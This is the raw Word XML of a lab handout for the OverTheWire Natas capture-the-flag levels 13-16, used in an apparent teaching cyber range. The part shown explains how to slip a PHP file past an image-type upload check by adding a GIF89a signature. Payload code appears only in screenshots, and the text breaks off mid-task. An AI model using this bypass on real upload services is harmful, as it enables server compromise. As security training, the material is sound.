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E7190" w14:textId="7D1E6922" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercise  –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 13-16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD11CD" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6390A8FB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF9846" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E718F45" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t>In t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>his lab exercise, stud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ents will learn new skills by setting up the Sublime Text editor with Python and using it to test web applications. Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Brigante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> VM environment students will be presented with progressive challenges from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OverTheWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) in which they will use previously learned skills to find the Capture the Flag (CTF) flags. This lesson covers levels 13-16. Students will learn to exploit a file upload service, an SQL injection vulnerability, and a blind SQL injection vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75921BBC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="013EFB0E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. Resources required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6831F005" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED1E8E6" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">This exercise requires the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Brigante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">VM running </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in the Cyber Range. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD59B4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5748BF" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. Initial Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528EB90D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485E16B1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">For this exercise, you will log in to your Cyber Range account and select the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Brigante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2020) environment, then click “start” to start your environment and “join” to get to your Linux desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C995E83" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CBBC1B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1275"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4. Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EF1F0" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46645329" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 13-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D736F8" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0864913A" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IMPORTANT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: You should have completed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> levels 0-13 before proceeding, since this lab builds on the labs from the previous lessons.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15241C57" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255FE6E9" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">As completed in previous tasks, we want to change the Python code to match our new parameters. Remember to change the syntax in the build output to HTML. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A400D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="4EE81088" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the screenshot below to check if you have all the parameters correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF1B22" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the file as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>natas13-14.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>natas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder on your Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50A625" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9355"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D639C" w14:paraId="34821B6B" w14:textId="77777777" w:rsidTr="009D47AC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7D49B8" w14:textId="34D24C21" w:rsidR="005D639C" w:rsidRDefault="000342D2">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BF570C" wp14:editId="3B4078DB">
                  <wp:extent cx="5943600" cy="32258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inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74029528" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222116D2" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A75305B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="2CCD0A7F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="135C1269" wp14:editId="4E3AF75F">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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1892300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51187224" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="31DFBE46" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4730DE50" wp14:editId="38CD84FF">
            <wp:extent cx="5943600" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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943600" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F934C2F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="00DE8F3B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">This looks very much like the previous level. Except now, we have some sanitation in the code. If the upload file is not a JPEG, then it will be filtered out. Let’s look at the code and see how they are doing this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75296A20" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="50D94775" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In a browser, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://natas13.natas.labs.overthewire.org/index-source.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Use the username of natas13 and the password retrieved from level 12-13. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A974638" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="586DAFB4" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the screenshot below, we can see the following line of code:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo “File is not an image”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> This must be where the filetype is filtered. If you look at the line above this line, it appears that the filter is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exif_imagetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA72AC" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3F73ED9F" wp14:editId="5D6FD56F">
            <wp:extent cx="5943600" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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2870200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0DE1A3" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="78960A0C" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:t xml:space="preserve">Let’s use Google to search for the PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exif_imagetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C6B6B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="0A81A17F" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using Google, search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exif_imagetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D2C67" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the link that shows the PHP manual page for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exif_imagetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D25CA" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="10DF7CF8" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="265BFA03" wp14:editId="31931424">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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943600" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9ED9D" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.php.net/manual/en/function.exif-imagetype.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AD90BB" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561"/>
    <w:p w14:paraId="0E96109B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This function reads the first bytes and is checking the signature. This means all we need to do is modify the top of our PHP program to resemble an image signature. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07C667" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00520561">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B532AD1" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>do.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Sublime Text editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E861E" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the script by adding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GIF89a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> on line one and moving the rest of the code to line 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8BFFD9" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the file. Make sure you close the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>do.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> file by exiting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>do.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab in your Sublime Text editor. We will need to open and read this file in the next steps, and we cannot if it is open in our editor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2DE3B" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Return to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>natas13-14.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab and change the parameters for the request as shown in the screenshot below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37745254" w14:textId="77777777" w:rsidR="00520561" w:rsidRDefault="00714309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Build the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9355"/>
